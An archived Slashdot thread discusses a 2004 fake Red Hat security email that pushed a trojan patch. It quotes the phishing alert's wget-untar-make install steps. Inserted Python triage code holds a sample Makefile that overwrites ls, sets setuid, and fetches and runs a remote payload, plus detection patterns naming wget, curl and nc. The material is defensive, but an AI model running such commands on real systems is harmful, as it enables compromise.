Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
Security only works when you know what to check (Score:4, Insightful)
However, what good is that against Joe User who falls for the bait and thinks the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals", and so they don't see any red flags indicating that this is bogus.
It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absence of those marks is not as alarming to them as it is to us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
Confidence (Score:3, Insightful)
But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it's one of the first times we see this. Lots of distros, lots of sources, lots of patches, major confusion.
Question (as I don't use Linux yet): Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it's essential for further desktop market share increase.
does it or not ? (Score:2, Insightful)
Either it is malicious or not.
Don't they know?
If it does, explain what it does and how to mitigate the damage.
If it does not, let people know so emotional energy can be used elsewhere.
What's the definition of 'malicious code' anyway?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.
And so... (Score:2, Insightful)
heh, maybe it won't be for long with the
Re: text (Why? Because.) (Score:5, Insightful)
Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.
Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.
Re:Security only works when you know what to check (Score:2, Insightful)
Yet that hasn't stopped Windows from being ready for "desktop primetime", huh? There will always be dim-witted Joe Users who will get burnt by these lame social engineering scams regardless of the OS. These very well could be the same people who will be taken advantage of offline as well. Linux is already on the desktop. It has been ready for primetime for a while. Of course there is nothing it can do to protect the user from the biggest security threat of them all: the user themselves.
Re: text (Why? Because.) (Score:5, Insightful)
Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here; you've got to know some basic geek stuff to go get the 'patch', unpack it, install it. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
Re:We knew this day would come (Score:4, Insightful)
Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - its the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.
Re:I love it! (Score:3, Insightful)
A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" of that, and become something less instead? It's one of the few good qualities that have brought us so far despite our lacking in other important areas...
In computer geeks, the need to know how things work naturally becomes directed towards computers...
This should be a mandatory feature (Score:1, Insightful)
Given that most users of Mozilla/Thunderbird are end users, and a large percentage would not run their own MTA, this would be a wonderful permanent feature in Mozilla.
It would be even better if you could use it as a rule to manage messages, i.e. immediately trash spoofed messages without presenting them to the end user.
Given the (lack of) speed with which ISPs are implementing SPF, doing it at the MUA end is a great stopgap.
Please submit it. It's a damn fine idea.
Re:Looks to be a Klik client? (Score:3, Insightful)
It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.
Re: I'll try it... Execution results! (Score:1, Insightful)
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar
* Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
*
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
The interesting thing is the link that is listed to download the trojan. Its the Stanford website. The person who owns
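The alert quoted above tells the reader to fetch a tarball, untar it and run make. As an added example (not the trojan from this thread, whose contents the page does not show, and not anything from Red Hat), here is the triage a practitioner would run on such an archive before extracting it: list the members without extracting, flag entries whose path escapes the target directory, symlinks that point outside it, members carrying setuid/setgid bits, and Makefile recipe lines that fetch code from the network, write into system directories, set setuid, touch cron or run something out of /tmp. The archive is built in memory from constructed contents; the file names, the Makefile and the 203.0.113.45 address are assumptions, not data from the real sample.

```python
import io
import re
import stat
import tarfile
import posixpath

# Heuristic patterns for recipe lines that a source "patch" never needs.
# Added example; the pattern list is an assumption, not a complete scanner.
RECIPE_PATTERNS = {
    "fetches code from the network": re.compile(r"\b(wget|curl|ftp|nc)\b"),
    "sets setuid/setgid": re.compile(r"chmod\s+(?:[ugoa]*\+s|[0-7]?[2-7][0-7]{3})"),
    "writes to system paths": re.compile(r"(?:>|\bcp|\bmv|\binstall|\btee)[^\n]*\s/(?:etc|usr|bin|sbin|lib)/"),
    "touches cron": re.compile(r"\bcrontab\b|/etc/cron"),
    "runs from a temp dir": re.compile(r"\b(?:sh|bash)\s+/tmp/"),
}

# Constructed Makefile shaped like what a "patch" delivered this way might carry.
MAKEFILE = (
    "all: fixer\n"
    "\tcp fixer /usr/bin/ls\n"
    "\tchmod 4755 /usr/bin/ls\n"
    "\twget -q http://203.0.113.45/stage2 -O /tmp/.s && sh /tmp/.s\n"
    "fixer: fixer.c\n"
    "\tgcc -o fixer fixer.c\n"
)


def _add_file(tar, name, data=b"", mode=0o644):
    info = tarfile.TarInfo(name)
    info.size = len(data)
    info.mode = mode
    tar.addfile(info, io.BytesIO(data))


def _add_symlink(tar, name, target):
    info = tarfile.TarInfo(name)
    info.type = tarfile.SYMTYPE
    info.linkname = target
    tar.addfile(info)


def build_sample_tarball():
    """Constructed gzip tarball (assumption) with the classic tricks inside."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        _add_file(tar, "fileutils-1.0.6.patch/Makefile", MAKEFILE.encode())
        _add_file(tar, "fileutils-1.0.6.patch/fixer.c", b"int main(void){return 0;}\n")
        _add_file(tar, "fileutils-1.0.6.patch/fixer", b"\x7fELF-placeholder", mode=0o4755)
        _add_file(tar, "../.ssh/authorized_keys", b"ssh-rsa AAAA... attacker\n")
        _add_symlink(tar, "fileutils-1.0.6.patch/etc", "/etc")
    return buf.getvalue()


def unsafe_path(name):
    """Absolute names or any '..' component escape the extraction directory."""
    parts = posixpath.normpath(name).split("/")
    return name.startswith("/") or ".." in parts


def link_escapes(member):
    """Symlink/hardlink whose target resolves outside the archive root."""
    target = member.linkname
    if target.startswith("/"):
        return True
    joined = posixpath.normpath(posixpath.join(posixpath.dirname(member.name), target))
    return joined.startswith("..")


def scan_makefile(text):
    """Return (line number, reason, recipe line) for suspicious recipe lines.
    Only tab-indented lines are recipes, i.e. the ones make actually executes."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.startswith("\t"):
            continue
        for reason, pat in RECIPE_PATTERNS.items():
            if pat.search(line):
                hits.append((lineno, reason, line.strip()))
    return hits


def triage_tarball(data):
    """Inspect archive bytes without extracting anything to disk."""
    findings = {"unsafe_paths": [], "setuid": [], "makefile": []}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            if unsafe_path(m.name):
                findings["unsafe_paths"].append(m.name)
            if (m.issym() or m.islnk()) and link_escapes(m):
                findings["unsafe_paths"].append(f"{m.name} -> {m.linkname}")
            if m.mode & (stat.S_ISUID | stat.S_ISGID):
                findings["setuid"].append(m.name)
            if m.isfile() and posixpath.basename(m.name) in ("Makefile", "makefile", "GNUmakefile"):
                text = tar.extractfile(m).read().decode("utf-8", "replace")
                findings["makefile"].extend(scan_makefile(text))
    return findings


if __name__ == "__main__":
    for key, value in triage_tarball(build_sample_tarball()).items():
        print(key, value)
```

Any hit here is reason enough not to run make. The triage is a safety net, not the fix: the fix the thread keeps circling back to is that a real Red Hat update arrives through the distribution's own update channel (up2date at the time), not as a tarball in a stranger's home directory.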
Re:I love it! (Score:4, Insightful)
You don't want a cure for this.
If you want a legitimate comparison between Linux and Windows security, observe:
This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".
Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on, and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slashdot (compared to 1 day before).
Re:We knew this day would come (Score:3, Insightful)
> if all people had:
>
> 1) Startup Monitor - Painfully simple, no one
> should be without it.
I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.
Malware: Do you want to install this nasty browser hijacker?
n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!
> 2) Kerio Personal Firewall, or equivalent
Agreed, although even better is to have a NAT/firewall device for your internet connection. I'm not a fan of having a local "personal" firewall on a n00b's PC, as n00bs have a habit of screwing things up, and this includes screwing up their firewall software. If your firewall functionality is sitting in a little NAT box in the corner then they are not gonna accidentally screw it up. Also, personal firewalls such as ZoneAlarm can suffer from the "yes click reflex" problem.
Malware: Tries to 'phone home'
ZoneAlarm: Do you want to let application porn2u.exe have access to the internet?
n00b: Yes goddammit, and stop bugging me already!
> 3) An executable monitor as described above.
I'm not sure I understand what you are suggesting here. I assume you are referring to a process listing app, such as the Windows task manager? Most clueless n00bs are not capable of comprehending what task manager is showing them. There are too many "good" processes that are virtually unidentifiable listed.
Re: I'll try it... Execution results! (Score:3, Insightful)
Not if you run your own mail server(s).
As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?
(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)
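An added example (not from the thread, the plugin idea above, or Red Hat) that covers both the "check SPF in the MUA" suggestion earlier in the thread and the "read the full headers, notice the IP addresses" advice just above. It parses a constructed message modelled on the fake alert, takes the IP of the host that connected to the receiving MX, evaluates it against the From domain's SPF record, and lists linked hosts that are not under the From domain. The message, the relay addresses and the SPF record are assumptions using RFC 5737 documentation ranges; the record table stands in for the DNS TXT lookup a real checker performs, and only the ip4, ip6 and all mechanisms are evaluated.

```python
import re
import ipaddress
from email import message_from_string
from email.utils import parseaddr

# Assumption: stand-in for DNS TXT lookups. This is NOT Red Hat's real SPF data.
FAKE_DNS_TXT = {
    "redhat.com": "v=spf1 ip4:198.51.100.0/24 -all",
}

# Constructed message modelled on the fake alert quoted in this thread.
# The host that spoke to our MX (203.0.113.45) is outside the SPF range above.
SAMPLE_MESSAGE = """\
Return-Path: <security@redhat.com>
Received: from relay.example.net (relay.example.net [203.0.113.45])
\tby mx.recipient.example (Postfix) with ESMTP id 1A2B3C
Received: from [10.0.0.5] (unknown [10.0.0.5])
\tby relay.example.net (Postfix) with SMTP id 9Z8Y7X
From: RedHat Security Team <security@redhat.com>
To: user@recipient.example
Subject: Critical fileutils-1.0.6 patch

Dear RedHat user,
wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar
More details at http://fedora-redhat.com/security/update.html
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
URL_RE = re.compile(r"(?:https?://|www\.)[^\s\"'<>]+", re.IGNORECASE)


def received_ips(msg):
    """IPs of each hop, newest first: MTAs prepend Received headers, so only the
    topmost line (written by your own MX) is trustworthy; lower ones can be forged."""
    ips = []
    for hdr in msg.get_all("Received", []):
        m = IP_RE.search(hdr)
        if m:
            ips.append(m.group(1))
    return ips


def check_spf(ip, domain, txt=FAKE_DNS_TXT):
    """Evaluate the ip4/ip6/all mechanisms of domain's SPF record (RFC 7208 terms).
    a, mx, include, exists and redirect are not resolved here; a real checker
    must handle them, so an unsupported term simply does not match."""
    record = txt.get(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    addr = ipaddress.ip_address(ip)
    results = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
    for term in record.split()[1:]:
        qual = "+"
        if term[0] in results:
            qual, term = term[0], term[1:]
        if term == "all":
            return results[qual]
        if term.startswith(("ip4:", "ip6:")):
            net = ipaddress.ip_network(term[4:], strict=False)
            if addr.version == net.version and addr in net:
                return results[qual]
    return "neutral"  # RFC 7208 default when no mechanism matches


def suspicious_hosts(body, sender_domain):
    """Hostnames linked in the body that are not the sender's domain or under it.
    The '.' prefix matters: fedora-redhat.com is not a subdomain of redhat.com."""
    hosts = set()
    for url in URL_RE.findall(body):
        host = re.sub(r"^https?://", "", url, flags=re.IGNORECASE).split("/")[0].lower()
        if host != sender_domain and not host.endswith("." + sender_domain):
            hosts.add(host)
    return sorted(hosts)


def triage(raw):
    msg = message_from_string(raw)
    sender_domain = parseaddr(msg["From"])[1].rpartition("@")[2].lower()
    hops = received_ips(msg)
    connecting_ip = hops[0] if hops else None
    return {
        "sender_domain": sender_domain,
        "connecting_ip": connecting_ip,
        "spf": check_spf(connecting_ip, sender_domain) if connecting_ip else "none",
        "suspicious_hosts": suspicious_hosts(msg.get_payload(), sender_domain),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_MESSAGE))
```

On the constructed message this yields an SPF "fail" for the connecting relay and two linked hosts outside redhat.com. The point of the comment above stands, though: an SPF result is only as good as the Received line you trust, which is the one your own server wrote, and a domain with no SPF record gives you "none", not a verdict.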
Re:We knew this day would come (Score:3, Insightful)
The trouble again would be that most clueless users won't understand what the window asking:
Do you want to allow application
"W1NPR0C32.EXE" to execute?
[YES] [NO]
means, which leads to the same "yes click reflex" problem I described above.
It is a problem, because no matter what you do, there is always going to be a group of numbnuts out there who will click yes on anything that pops up. Often, they won't even read what it says. Any solution that produces even greater numbers of YES/NO dialogues will only serve to make the problem worse I'm afraid.
The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.
This can be achieved in theory by running Windows under a restricted user policy, but in practice it doesn't work because too many programmers are too lazy to write their programs to run with anything other than "administrator" privileges, so we are stuck with a dilemma that will be hard to overcome.
Re:text of site (Score:1, Insightful)
>doesn't belong to RedHat? This is social engineering at its finest.
At its finest? Who the hell are you kidding. This is a sample of social engineering, yes... but... my god, it's far from being the cream of the crop. Way way way too many simple mistakes.
Shows a lack of attention to detail. Bad grammar, Taiwan mail relay, no up2date source...... screams amateur...
Now if the grammar had been correct, if the target had been correct (RH 9, FC 2), if the delivery method had been correct (up2date source), if the mail header had been properly faked... then it would rank as a decent attempt. But really... with the ease at which email headers can be faked.... this doesn't even register on the talent meter of social engineering.
Re:Christ, they didn't do a very good job... (Score:2, Insightful)
It's a common bad habit usually done to satisfy the ego of the admin. Most Red Hat customers use the distro because of the support arrangements available. That support, which doesn't exist for third party packages (including 'roll their own') is more valuable than the ego boost the admin gets from doing things themselves.
If you go replacing your packages with third party ones, you also miss out on a lot of the effort that Red Hat put into backporting security fixes. Does that Apache security fix change the format of module files? Not if you're running Red Hat's Apache package, it doesn't. If you're running something else, either backport it yourself (most people who have the skills to do that decide to let Red Hat do it for them) or update every module you're using.
Re:text of site (Score:1, Insightful)
Oh but it does! Stop being an ass and look around you. Not everyone is an expert RedHat administrator. Not everyone is paranoid enough to check the headers of every email they receive. Some people are <gasp> newbies! To them the "redhat-fedora" domain looks damned official.
Re:text of site (Score:3, Insightful)
Yes. At least in combination with the other glaring flaws I and others have already mentioned.
People who subscribe to security update announcements (and thus would be the primary target for a fake security announcement) have actively chosen to do so, and know what they look like, where they're sent from, what domains are usually referenced and what that/those website(s) look like. People who have not subscribed to such announcements would likely be more suspicious of unsolicited messages of this kind.
There are always exceptions. Some people will be taken in by this, no doubt, despite them being sufficiently savvy to have chosen to install a community-supported Linux distribution in the first place.
It's social engineering all right. Just not at its finest.
WTF?? (Score:3, Insightful)
We're supposed to believe this?
Re: I'll try it... Execution results! (Score:3, Insightful)
Agreed, but it needs to be very, very careful as to any assumptions as to exactly which system it was that worked.
The first order of business is to somehow, anyhow, stem the tide.
The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address not mine.
Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superior forces with inferior forces.
Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc. know that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.